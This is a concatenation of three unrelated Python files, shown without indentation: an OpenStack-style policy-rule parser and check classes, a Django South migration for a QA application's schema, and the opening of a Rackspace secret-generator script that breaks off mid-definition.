self.kind = kind
self.match = match
def __str__(self):
"""Return a string representation of this check."""
return "%s:%s" % (self.kind, self.match)
class NotCheck(BaseCheck):
"""Implements the "not" logical operator.
A policy check that inverts the result of another policy check.
"""
def __init__(self, rule):
"""Initialize the 'not' check.
:param rule: The rule to negate. Must be a Check.
"""
self.rule = rule
def __str__(self):
"""Return a string representation of this check."""
return "not %s" % self.rule
def __call__(self, target, cred, enforcer):
"""Check the policy.
Returns the logical inverse of the wrapped check.
"""
return not self.rule(target, cred, enforcer)
class AndCheck(BaseCheck):
"""Implements the "and" logical operator.
A policy check that requires that a list of other checks all return True.
"""
def __init__(self, rules):
"""Initialize the 'and' check.
:param rules: A list of rules that will be tested.
"""
self.rules = rules
def __str__(self):
"""Return a string representation of this check."""
return "(%s)" % ' and '.join(str(r) for r in self.rules)
def __call__(self, target, cred, enforcer):
"""Check the policy.
Requires that all rules accept in order to return True.
"""
for rule in self.rules:
if not rule(target, cred, enforcer):
return False
return True
def add_check(self, rule):
"""Adds rule to be tested.
Allows addition of another rule to the list of rules that will
be tested. Returns the AndCheck object for convenience.
"""
self.rules.append(rule)
return self
class OrCheck(BaseCheck):
"""Implements the "or" operator.
A policy check that requires that at least one of a list of other
checks returns True.
"""
def __init__(self, rules):
"""Initialize the 'or' check.
:param rules: A list of rules that will be tested.
"""
self.rules = rules
def __str__(self):
"""Return a string representation of this check."""
return "(%s)" % ' or '.join(str(r) for r in self.rules)
def __call__(self, target, cred, enforcer):
"""Check the policy.
Requires that at least one rule accept in order to return True.
"""
for rule in self.rules:
if rule(target, cred, enforcer):
return True
return False
def add_check(self, rule):
"""Adds rule to be tested.
Allows addition of another rule to the list of rules that will
be tested. Returns the OrCheck object for convenience.
"""
self.rules.append(rule)
return self
def _parse_check(rule):
"""Parse a single base check rule into an appropriate Check object."""
# Handle the special checks
if rule == '!':
return FalseCheck()
elif rule == '@':
return TrueCheck()
try:
kind, match = rule.split(':', 1)
except Exception:
LOG.exception(_("Failed to understand rule %s") % rule)
# If the rule is invalid, we'll fail closed
return FalseCheck()
# Find what implements the check
if kind in _checks:
return _checks[kind](kind, match)
elif None in _checks:
return _checks[None](kind, match)
else:
LOG.error(_("No handler for matches of kind %s") % kind)
return FalseCheck()
def _parse_list_rule(rule):
"""Translates the old list-of-lists syntax into a tree of Check objects.
Provided for backwards compatibility.
"""
# Empty rule defaults to True
if not rule:
return TrueCheck()
# Outer list is joined by "or"; inner list by "and"
or_list = []
for inner_rule in rule:
# Elide empty inner lists
if not inner_rule:
continue
# Handle bare strings
if isinstance(inner_rule, six.string_types):
inner_rule = [inner_rule]
# Parse the inner rules into Check objects
and_list = [_parse_check(r) for r in inner_rule]
# Append the appropriate check to the or_list
if len(and_list) == 1:
or_list.append(and_list[0])
else:
or_list.append(AndCheck(and_list))
# If we have only one check, omit the "or"
if not or_list:
return FalseCheck()
elif len(or_list) == 1:
return or_list[0]
return OrCheck(or_list)
# Used for tokenizing the policy language
_tokenize_re = re.compile(r'\s+')
def _parse_tokenize(rule):
"""Tokenizer for the policy language.
Most of the single-character tokens are specified in the
_tokenize_re; however, parentheses need to be handled specially,
because they can appear inside a check string. Thankfully, those
parentheses that appear inside a check string can never occur at
the very beginning or end ("%(variable)s" is the correct syntax).
"""
for tok in _tokenize_re.split(rule):
# Skip empty tokens
if not tok or tok.isspace():
continue
# Handle leading parens on the token
clean = tok.lstrip('(')
for i in range(len(tok) - len(clean)):
yield '(', '('
# If it was only parentheses, continue
if not clean:
continue
else:
tok = clean
# Handle trailing parens on the token
clean = tok.rstrip(')')
trail = len(tok) - len(clean)
# Yield the cleaned token
lowered = clean.lower()
if lowered in ('and', 'or', 'not'):
# Special tokens
yield lowered, clean
elif clean:
# Not a special token, but not composed solely of ')'
if len(tok) >= 2 and ((tok[0], tok[-1]) in
[('"', '"'), ("'", "'")]):
# It's a quoted string
yield 'string', tok[1:-1]
else:
yield 'check', _parse_check(clean)
# Yield the trailing parens
for i in range(trail):
yield ')', ')'
class ParseStateMeta(type):
"""Metaclass for the ParseState class.
Facilitates identifying reduction methods.
"""
def __new__(mcs, name, bases, cls_dict):
"""Create the class.
Injects the 'reducers' list, a list of tuples matching token sequences
to the names of the corresponding reduction methods.
"""
reducers = []
for key, value in cls_dict.items():
if not hasattr(value, 'reducers'):
continue
for reduction in value.reducers:
reducers.append((reduction, key))
cls_dict['reducers'] = reducers
return super(ParseStateMeta, mcs).__new__(mcs, name, bases, cls_dict)
def reducer(*tokens):
"""Decorator for reduction methods.
Arguments are a sequence of tokens, in order, which should trigger running
this reduction method.
"""
def decorator(func):
# Make sure we have a list of reducer sequences
if not hasattr(func, 'reducers'):
func.reducers = []
# Add the tokens to the list of reducer sequences
func.reducers.append(list(tokens))
return func
return decorator
@six.add_metaclass(ParseStateMeta)
class ParseState(object):
"""Implement the core of parsing the policy language.
Uses a greedy reduction algorithm to reduce a sequence of tokens into
a single terminal, the value of which will be the root of the Check tree.
Note: error reporting is rather lacking. The best we can get with
this parser formulation is an overall "parse failed" error.
Fortunately, the policy language is simple enough that this
shouldn't be that big a problem.
"""
def __init__(self):
"""Initialize the ParseState."""
self.tokens = []
self.values = []
def reduce(self):
"""Perform a greedy reduction of the token stream.
If a reducer method matches, it will be executed, then the
reduce() method will be called recursively to search for any more
possible reductions.
"""
for reduction, methname in self.reducers:
if (len(self.tokens) >= len(reduction) and
self.tokens[-len(reduction):] == reduction):
# Get the reduction method
meth = getattr(self, methname)
# Reduce the token stream
results = meth(*self.values[-len(reduction):])
# Update the tokens and values
self.tokens[-len(reduction):] = [r[0] for r in results]
self.values[-len(reduction):] = [r[1] for r in results]
# Check for any more reductions
return self.reduce()
def shift(self, tok, value):
"""Adds one more token to the state. Calls reduce()."""
self.tokens.append(tok)
self.values.append(value)
# Do a greedy reduce...
self.reduce()
@property
def result(self):
"""Obtain the final result of the parse.
Raises ValueError if the parse failed to reduce to a single result.
"""
if len(self.values) != 1:
raise ValueError("Could not parse rule")
return self.values[0]
@reducer('(', 'check', ')')
@reducer('(', 'and_expr', ')')
@reducer('(', 'or_expr', ')')
def _wrap_check(self, _p1, check, _p2):
"""Turn parenthesized expressions into a 'check' token."""
return [('check', check)]
@reducer('check', 'and', 'check')
def _make_and_expr(self, check1, _and, check2):
"""Create an 'and_expr'.
Join two checks by the 'and' operator.
"""
return [('and_expr', AndCheck([check1, check2]))]
@reducer('and_expr', 'and', 'check')
def _extend_and_expr(self, and_expr, _and, check):
"""Extend an 'and_expr' by adding one more check."""
return [('and_expr', and_expr.add_check(check))]
@reducer('check', 'or', 'check')
def _make_or_expr(self, check1, _or, check2):
"""Create an 'or_expr'.
Join two checks by the 'or' operator.
"""
return [('or_expr', OrCheck([check1, check2]))]
@reducer('or_expr', 'or', 'check')
def _extend_or_expr(self, or_expr, _or, check):
"""Extend an 'or_expr' by adding one more check."""
return [('or_expr', or_expr.add_check(check))]
@reducer('not', 'check')
def _make_not_expr(self, _not, check):
"""Invert the result of another check."""
return [('check', NotCheck(check))]
def _parse_text_rule(rule):
"""Parses policy to the tree.
Translates a policy written in the policy language into a tree of
Check objects.
"""
# Empty rule means always accept
if not rule:
return TrueCheck()
# Parse the token stream
state = ParseState()
for tok, value in _parse_tokenize(rule):
state.shift(tok, value)
try:
return state.result
except ValueError:
# Couldn't parse the rule
LOG.exception(_("Failed to understand rule %r") % rule)
# Fail closed
return FalseCheck()
def parse_rule(rule):
"""Parses a policy rule into a tree of Check objects."""
# If the rule is a string, it's in the policy language
if isinstance(rule, six.string_types):
return _parse_text_rule(rule)
return _parse_list_rule(rule)
def register(name, func=None):
"""Register a function or Check class as a policy check.
:param name: Gives the name of the check type, e.g., 'rule',
'role', etc. If name is None, a default check type
will be registered.
:param func: If given, provides the function or class to register.
If not given, returns a function taking one argument
to specify the function or class to register,
allowing use as a decorator.
"""
# Perform the actual decoration by registering the function or
# class. Returns the function or class for compliance with the
# decorator interface.
def decorator(func):
_checks[name] = func
return func
# If the function or class is given, do the registration
if func:
return decorator(func)
return decorator
@register("rule")
class RuleCheck(Check):
def __call__(self, target, creds, enforcer):
"""Recursively checks credentials based on the defined rules."""
try:
return enforcer.rules[self.match](target, creds, enforcer)
except KeyError:
# We don't have any matching rule; fail closed
return False
@register("role")
class RoleCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check that there is a matching role in the cred dict."""
return self.match.lower() in [x.lower() for x in creds['roles']]
@register('http')
class HttpCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check http: rules by calling to a remote server.
This example implementation simply verifies that the response
is exactly 'True'.
"""
url = ('http:' + self.match) % target
data = {'target': jsonutils.dumps(target),
'credentials': jsonutils.dumps(creds)}
post_data = urlparse.urlencode(data)
f = urlrequest.urlopen(url, post_data)
return f.read() == "True"
@register(None)
class GenericCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check an individual match.
Matches look like:
tenant:%(tenant_id)s
role:compute:admin
True:%(user.enabled)s
'Member':%(role.name)s
"""
# TODO(termie): do dict inspection via dot syntax
try:
match = self.match % target
except KeyError:
# While doing GenericCheck if key not
# present in Target return false
return False
try:
# Try to interpret self.kind as a literal
leftval = ast.literal_eval(self.kind)
except ValueError:
try:
leftval = creds[self.kind]
except KeyError:
return False
return match == six.text_type(leftval)
|
|
# -*- coding: utf-8 -*-
from south.db import db, engine
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Category.slug'
db.alter_column('qa_category', 'slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=255))
# Changing field 'Category.name'
db.alter_column('qa_category', 'name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255))
# Changing field 'Reference.name'
db.alter_column('qa_reference', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
# Changing field 'Test.name'
db.alter_column('qa_test', 'name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255))
if 'sql_server' in engine:
sql_server_idxs = (('qa_testlist', 'name'), ('qa_testlistcycle', 'name'),)
for table_name, column_name in sql_server_idxs:
try:
db.drop_index(table_name, column_name)
except:
pass
# sqlserver_utils.drop_index(db,table_name,column_name)
# Changing field 'TestList.name'
db.alter_column('qa_testlist', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
# Changing field 'TestListCycle.name'
db.alter_column('qa_testlistcycle', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
if 'sql_server' in engine:
for table_name, column_name in sql_server_idxs:
db.create_index(table_name, [column_name])
def backwards(self, orm):
# Changing field 'Category.slug'
db.alter_column('qa_category', 'slug', self.gf('django.db.models.fields.SlugField')(max_length=255, unique=True))
# Changing field 'Category.name'
db.alter_column('qa_category', 'name', self.gf('django.db.models.fields.CharField')(max_length=255, unique=True))
# Changing field 'Reference.name'
db.alter_column('qa_reference', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
# Changing field 'Test.name'
db.alter_column('qa_test', 'name', self.gf('django.db.models.fields.CharField')(max_length=255, unique=True))
# Changing field 'TestList.name'
db.alter_column('qa_testlist', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
# Changing field 'TestListCycle.name'
db.alter_column('qa_testlistcycle', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'qa.category': {
'Meta': {'object_name': 'Category'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'})
},
'qa.frequency': {
'Meta': {'ordering': "('nominal_interval',)", 'object_name': 'Frequency'},
'due_interval': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'nominal_interval': ('django.db.models.fields.PositiveIntegerField', [], {}),
'overdue_interval': ('django.db.models.fields.PositiveIntegerField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'qa.reference': {
'Meta': {'object_name': 'Reference'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reference_creators'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reference_modifiers'", 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'numerical'", 'max_length': '15'}),
'value': ('django.db.models.fields.FloatField', [], {})
},
'qa.test': {
'Meta': {'object_name': 'Test'},
'calculation_procedure': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Category']"}),
'choices': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'constant_value': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_creator'", 'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_modifier'", 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'procedure': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'simple'", 'max_length': '10'})
},
'qa.testinstance': {
'Meta': {'ordering': "('work_completed',)", 'object_name': 'TestInstance'},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_instance_creator'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_instance_modifier'", 'to': "orm['auth.User']"}),
'pass_fail': ('django.db.models.fields.CharField', [], {'max_length': '20', 'db_index': 'True'}),
'reference': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Reference']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'review_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'reviewed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'skipped': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestInstanceStatus']"}),
'test_list_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestListInstance']", 'null': 'True', 'blank': 'True'}),
'tolerance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Tolerance']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'unit_test_info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.UnitTestInfo']"}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'work_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'work_started': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'})
},
'qa.testinstancestatus': {
'Meta': {'object_name': 'TestInstanceStatus'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'export_by_default': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'requires_comment': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'requires_review': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'qa.testlist': {
'Meta': {'object_name': 'TestList'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'qa_testlist_created'", 'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'qa_testlist_modified'", 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'sublists': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['qa.TestList']", 'null': 'True', 'blank': 'True'}),
'tests': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['qa.Test']", 'through': "orm['qa.TestListMembership']", 'symmetrical': 'False'})
},
'qa.testlistcycle': {
'Meta': {'object_name': 'TestListCycle'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'qa_testlistcycle_created'", 'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'qa_testlistcycle_modified'", 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'test_lists': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['qa.TestList']", 'through': "orm['qa.TestListCycleMembership']", 'symmetrical': 'False'})
},
'qa.testlistcyclemembership': {
'Meta': {'ordering': "('order',)", 'object_name': 'TestListCycleMembership'},
'cycle': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestListCycle']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {}),
'test_list': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestList']"})
},
'qa.testlistinstance': {
'Meta': {'ordering': "('work_completed',)", 'object_name': 'TestListInstance'},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_list_instance_creator'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_list_instance_modifier'", 'to': "orm['auth.User']"}),
'test_list': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestList']"}),
'unit_test_collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.UnitTestCollection']"}),
'work_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'work_started': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'})
},
'qa.testlistmembership': {
'Meta': {'ordering': "('order',)", 'unique_together': "(('test_list', 'test'),)", 'object_name': 'TestListMembership'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'test': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Test']"}),
'test_list': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestList']"})
},
'qa.tolerance': {
'Meta': {'object_name': 'Tolerance'},
'act_high': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'act_low': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tolerance_creators'", 'to': "orm['auth.User']"}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mc_pass_choices': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'mc_tol_choices': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tolerance_modifiers'", 'to': "orm['auth.User']"}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'tol_high': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'tol_low': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'qa.unittestcollection': {
'Meta': {'ordering': "('testlist__name', 'testlistcycle__name')", 'unique_together': "(('unit', 'frequency', 'content_type', 'object_id'),)", 'object_name': 'UnitTestCollection'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'assigned_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'frequency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Frequency']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestListInstance']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['units.Unit']"}),
'visible_to': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[]', 'related_name': "'test_collection_visibility'", 'symmetrical': 'False', 'to': "orm['auth.Group']"})
},
'qa.unittestinfo': {
'Meta': {'unique_together': "(['test', 'unit'],)", 'object_name': 'UnitTestInfo'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'assigned_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestInstance']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'reference': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Reference']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'test': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Test']"}),
'tolerance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Tolerance']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['units.Unit']"})
},
'units.modality': {
'Meta': {'unique_together': "[('type', 'energy')]", 'object_name': 'Modality'},
'energy': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'units.unit': {
'Meta': {'ordering': "['number']", 'object_name': 'Unit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'install_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'modalities': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['units.Modality']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'number': ('django.db.models.fields.PositiveIntegerField', [], {'unique': 'True'}),
'serial_number': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['units.UnitType']"})
},
'units.unittype': {
'Meta': {'unique_together': "[('name', 'model')]", 'object_name': 'UnitType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'vendor': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['qa']
|
|
#!/usr/bin/env python
# Copyright 2014, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# (c) 2014, Kevin Carter <kevin.carter@rackspace.com>
import argparse
import datetime
import hashlib
import os
import random
import tarfile
import uuid
from Crypto import Random
try:
import yaml
except ImportError:
raise SystemExit('Missing Dependency, "PyYAML"')
class CredentialGenerator(object):
"""Credential generator class.
This class is simply a method to generate random secrets. This class will
NOT encrypt values rather it creates the values which will be used as
secrets within an application. The credential generator will return
strings in various sizes based on the requested secret type.
There are four secret types that can be used within the class; `password`,
`token`, 'secret', and `key`. These types return variable lengths of data.
password: 16 - 64 character string
secret: 16 - 64 character string
token: 64 - 72 character string
key: 24, or 32 character string (Needs to be AES compatible)
Usage:
>>> generator = CredentialGenerator()
>>> token = generator.generator('token')
"""
def generator(self, pw_type):
